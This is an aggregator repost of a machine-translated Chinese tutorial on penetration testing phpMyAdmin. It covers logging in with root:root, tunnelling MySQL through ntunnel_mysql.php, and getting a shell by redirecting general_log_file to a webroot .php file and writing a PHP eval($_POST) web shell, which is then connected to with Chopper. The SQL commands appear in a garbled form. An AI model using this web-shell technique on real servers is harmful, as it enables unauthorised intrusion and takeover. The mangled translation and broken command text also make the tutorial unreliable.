您当前的位置:首页 >> 行业热点 >  >> 
2022年01月04日整理发布:分享Phpmyadmin的一次渗透测试 动态焦点
来源: 元宇宙网      时间:2023-02-22 09:47:57

最近大家都在讨论2022年01月04日整理发布:分享Phpmyadmin的一次渗透测试相关的事情,对此小编也是非常的感应兴趣,那么这件事具体又是怎么回事呢?下面就是小编搜索到的关于2022年01月04日整理发布:分享Phpmyadmin的一次渗透测试事件的相关信息,我们一起来看看吧!


(资料图片)

我给大家讲一个分享Phpmyadmin的渗透测试。相信朋友们也应该很关心这个话题。现在,让我们来谈谈为我的朋友分享Phpmyadmin的渗透测试。边肖还收集了关于共享Phpmyadmin渗透测试的相关信息。我希望你看到后会喜欢。

下面,phpmyadmin教程栏目将介绍一个Phpmyadmin的渗透测试,希望对有需要的朋友有所帮助!

首先对某站进行了目录扫描,发现phpmyadmin尝试了弱密码root:root幸运的进入

尝试使用Navicate连接到数据库会返回禁止远程连接到数据库:

但是,当远程命令执行发现本地3306端口打开时,它会尝试通过代理进行连接:

将ntunnel_mysql.php文件(数据库的代理脚本)上传到Navicat安装目录中目标服务器的任何网站目录(稍后获取getshell后上传)

上传到D:/phpStudy/WWW目录进行访问。http://XXX/ntunnel_mysql.php测试成功。

进行测试连接:

(此时,打开Navicat在本地配置http连接,这里的通道地址会写你上面访问过的url,也就是说它是一个代理,在钩子上使用base64编码,防止waf从中捣乱,然后把localhost写成主机名,把账号密码写成lnmp01本地数据库用户的账号,因为需要连接lnmp01本地mysql)

Phpmyadmin获取外壳:

使用日志文件

MySQL及以上版本将创建日志文件。修改日志的全局变量也可以是getshell。但是您也应该拥有读写生成的日志的权限。

设置全局general _ log=" ON#当打开general时执行的sql语句将出现在WIN-30DFNC8L78A.log文件中。然后,如果general_log_file的值被修改,执行的sql语句将被相应地生成,然后getshell。

SET global general _ log _ file=" d :/phpStudy/WWW/test 1234 . PHP ";#映射将生成test1234.php文件。

选择?PHP eval($ _ POST[2019]);";#在test1234.php文件中写入一个单词特洛伊

斩波器连接:

以上是分享一个Phpmyadmin渗透测试的细节!

来源:php中文网站

X 关闭

X 关闭